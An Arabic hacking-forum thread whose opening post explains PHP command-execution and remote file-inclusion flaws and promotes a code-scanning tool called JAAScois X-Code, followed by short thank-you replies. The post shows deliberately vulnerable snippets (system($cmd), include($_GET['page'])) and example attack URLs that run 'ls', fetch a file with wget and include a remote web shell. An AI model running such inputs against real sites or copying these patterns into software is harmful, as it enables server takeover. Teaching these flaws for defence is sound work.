إختبار وتحليل أخطر ثغرات PHP بإستخدام برنامج JAAScois X-Code v1.0

إختبار وتحليل أخطر ثغرات PHP بإستخدام برنامج JAAScois X-Code v1.0


النتائج 1 إلى 7 من 7

الموضوع: إختبار وتحليل أخطر ثغرات PHP بإستخدام برنامج JAAScois X-Code v1.0

  1. #1
    هكر متميز الصورة الرمزية خبوش
    تاريخ التسجيل
    May 2010
    الدولة
    إآلسٌٍَسٌٍَسٌٍَسٌٍَسٌٍَسٌٍَسٌٍَعوٍُدُ يُهُ
    المشاركات
    667

    Hasri إختبار وتحليل أخطر ثغرات PHP بإستخدام برنامج JAAScois X-Code v1.0

    لغه برمجه المواقع PHP لغه عالميه تجمع بين قوتها وسهوله تعلمها وهذا سبب انتشارها
    قد تجد ان اغلب تطبيقات الويب وخاصه التجاريه كتبت بواسطه PHP مثل المنتديات وتطبيقات
    الاداره الاخرى.
    عيب هذه اللغه هو الجانب الأمني وخاصه للمبتدئين في لغه PHP تكمن سهوله هذه اللغه
    في انها اختصرت اكواد كثيره في لغات برمجه اخرى وجعلتها ضمن داله واحده بمعنى امر
    واحد دون الدخول في تفاصيل كثيره عن ماتقوم به هذه الداله وهنا يقع المبرمج في أخطاء
    تؤدي الى حدوث ثغرات أمنية تؤدي بذلك لإختراق الموقع.

    بعد دراسه هذا الموضوع ستصل الى مرحله تحليل الاكواد التي تكتبها وستسطيع اكتشاف
    الثغرات الامنيه الخطيرة في لغه PHP التي تؤدي للإختراق المباشر للسيرفر.


    أولاً: ثغرات تنفيذ الاوامر Command Execution
    هذا النوع من الثغرات يحدث نتيجه استخدام دوال تنفيذ الاوامر في لغه PHP بشكل خاطئ
    كيف؟
    في البدايه نريد ان نعرف ما هي دوال تنفيذ الاوامر , بإختصار هي دوال تستخدم لتنفيذ
    برامج النظام بشكل مباشر لتختصر عليك اكواد برمجه اضافيه ومثال على ذلك استخدام
    برنامج ارسال الايميل /usr/sbin/sendmail وغيرها الكثير من برامج النظام في انظمه يونكس
    الخطأ في مثل هذه الدوال يسمح للمهاجم من تنفيذ برامج النظام في مصلحته

    دوال تنفيذ الاوامر في لغه PHP هي:
    التي تنفذ بشكل مباشر: system و popen و shell_exec و exec
    هذه الدوال تنفذ اي برنامج نظام يمرر لها بشكل مباشر

    الآن سنأخذ مثال لطريقه الوقوع في الخطأ وإحداث ثغره تمكن المهاجم من إختراق الموقع

    كود PHP:
    <?php 
    system
    ($cmd);
    ?>
    لاحظ لو كان إستخدام هذه الداله بنفس الشكل في تطبيقك سيؤدي لإحداث ثغره Command Execution
    وسيقوم المهاجم بإستغلاله بهذا الشكل:
    كود PHP:
    www.alhasebat.com/index.php?cmd=يضع هنا اي امر يريد تنفيذه وهو عباره عن برنامج نظام 
    وهذا مثال لعرض المجلدات في السيرفر بإستخدام برنامج النظام ls
    www.alhasebat.com/index.php?cmd=ls
    تحميل ملف الى السيرفر بإستخدام برنامج النظام wget
    www.alhasebat.com/index.php?cmd=wget xxxxx

    قد تتوقع ان الموضوع سهل إكتشافه ولكن لو كانت لديك 100 صفحه كود كل صفحه تحتوي 100 سطر
    في هذه الحاله قد تكون المهمه صعبه ولذلك قد تحتاج مساعده JAAScois X-Code v1.0

    برنامج JAAScois X-Code v1.0 يقوم بإتباع طريقه جديده للتحليل وهي كالتالي:-
    البحث عن الدوال الخطرة وتحديدها وبعد ذلك قرائة البارمترات التي تمرر لها وبعد ذلك
    إجراء إختبار جديد للبارمتر وهل تمت اي عمليه اختبار لهذا البارمتر بعد التأكد من كل هذه
    الشروط يتم إظهار الكود على انه ثغره امنيه كما تلاحظ مع تحديد التعليمه والسطر والصفحه




    النوع الثاني من الثغرات الامنيه الخطرة

    ثانيا: ثغرات إدراج الملف FileInclusion
    هذا النوع من الثغرات خطير جدا ويؤدي لإختراق الموقع
    إدراج الملف هي عملية تقوم بقرائه ملف محدد وتنفيذه ضمن الصفحه الحاليه
    وهي عمليه تستخدم للإختصار وتوفر على المبرمج كتابه نفس الكود اكثر من مره
    الدوال المستخدم في عمليه الادراج هي: include و fopen و file
    و include_once و require و require_once


    وطريقه الاستخدام معروفه بهذا الشكل:
    كود PHP:
    include('index2.php'); 
    تلاحظ ادراج ملف بإسم index2.php ماذا لو كان الكود بدون معالجة بهذا الشكل
    كود PHP:
    include($_GET['page']); 
    بالتأكيد يمكن استغلاله بإستخدام الويب شيل او صفحات اداره الموقع وهي عباره عن تطبيقات
    مكتوبه ب PHP عند فتح الصفحه تجد لوحه تحكم للموقع مثل رفع الملفات وتحرير الصفحات وغيرها
    ماذا لو قمنا بإدراج صفح تحكم ليتم تنفيذها في الكود السابق بهذا الشكل
    كود PHP:
    www.alhasebat.com/index.php?pageهنا نضع عنوان صفحه الويب شل او صفحه التحكم 
    مثل
    http://www.alhasebat.com/index.php?p...m/webshell.php
    سيقوم تطبيق PHP بتنفيذ داله الادراج وستتم عملية قرائة صفحه الويب شل وتنفيذه في موقعك
    و ستلاحظ ظهور لوحه التحكم للمهاجم ويستطيع تنفيذ كل شيء في السيرفر

    عملية التخلص من هذه الثغرات قد تكون بسيطة اما مع التطبيقات الكبيرة
    تستطيع استخدام JAAScois X-Code v1.0
    بهذا الشكل:

    وفي النهاية نكون قد عرضنا الثغرات الامنية التي تؤدي للإختراق المباشر في تطبيقات PHP
    وبالتوفيق ,,
    برنامج JAAScois X-Code v1.0
    http://www.jaascois.com/software/X-C...coisX-Code.exe
    _
    [CENTER]


    آسمع قبل ألرحيل ~َ


  2. #2

    افتراضي رد: إختبار وتحليل أخطر ثغرات PHP بإستخدام برنامج JAAScois X-Code v1.0

    موضوع جميل جدآآ معلومات مفيده بتوفيق لك


    اشهد ان لا اله الا الله وان محمد رسول الله

    http://www.aljyyosh.com/vb/showthread.php?t=25438


    افضل موقع


    www.livequran.org




  3. #3

    افتراضي رد: إختبار وتحليل أخطر ثغرات PHP بإستخدام برنامج JAAScois X-Code v1.0

    موضوع مهم جدا، ويحتوي على اساسيات مهمة للمبتدئين في هذا المجال.
    وفقك الله وسدد خطاك، وننتظر جديد إبداعاتك
    الرجاء عدم المراسلة إلا للضرورة،
    اذا كان هنالك سؤال فيتم وضعه في قسم الاستفسارات بعد مراجعة قوانين القسم
    وطلبات الإختراق مرفوضة مسبقا.

  4. #4

    افتراضي رد: إختبار وتحليل أخطر ثغرات PHP بإستخدام برنامج JAAScois X-Code v1.0

    تشكر على الشرح الجميل
    تحياتي



  5. #5
    هكر متميز الصورة الرمزية خبوش
    تاريخ التسجيل
    May 2010
    الدولة
    إآلسٌٍَسٌٍَسٌٍَسٌٍَسٌٍَسٌٍَسٌٍَعوٍُدُ يُهُ
    المشاركات
    667

    افتراضي رد: إختبار وتحليل أخطر ثغرات PHP بإستخدام برنامج JAAScois X-Code v1.0

    يِّعطيِّكـَم آلعآفيِّه على آلمرٍوٍرٍ آلجميِّل
    [CENTER]


    آسمع قبل ألرحيل ~َ


  6. #6

    افتراضي رد: إختبار وتحليل أخطر ثغرات PHP بإستخدام برنامج JAAScois X-Code v1.0

    تشكَرآآتي ع آلطرح
    بَ إنتظآر إبدآعآتكك~

  7. #7

    افتراضي رد: إختبار وتحليل أخطر ثغرات PHP بإستخدام برنامج JAAScois X-Code v1.0

    بارك الله فيك ,15,

المواضيع المتشابهه

  1. برنامج Code Lifter 5 لفحص الروابط من التلغيم
    بواسطة pSyCh0_3D في المنتدى منتدى حماية الأجهزة
    مشاركات: 27
    آخر مشاركة: 02-21-2012, 11:00 PM
  2. مشاركات: 21
    آخر مشاركة: 06-10-2011, 12:39 PM
  3. Code Mar برنامج لاستغلال تغرة الايميل البديل لسرقة حسابات الهوتميل
    بواسطة silent-killer في المنتدى قسم المواضيع المخالفة والمكررة
    مشاركات: 2
    آخر مشاركة: 01-16-2011, 10:37 AM
  4. شرح إستخراج المواقع بإستخدام الشيل
    بواسطة She!! Access في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 4
    آخر مشاركة: 07-02-2010, 02:37 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •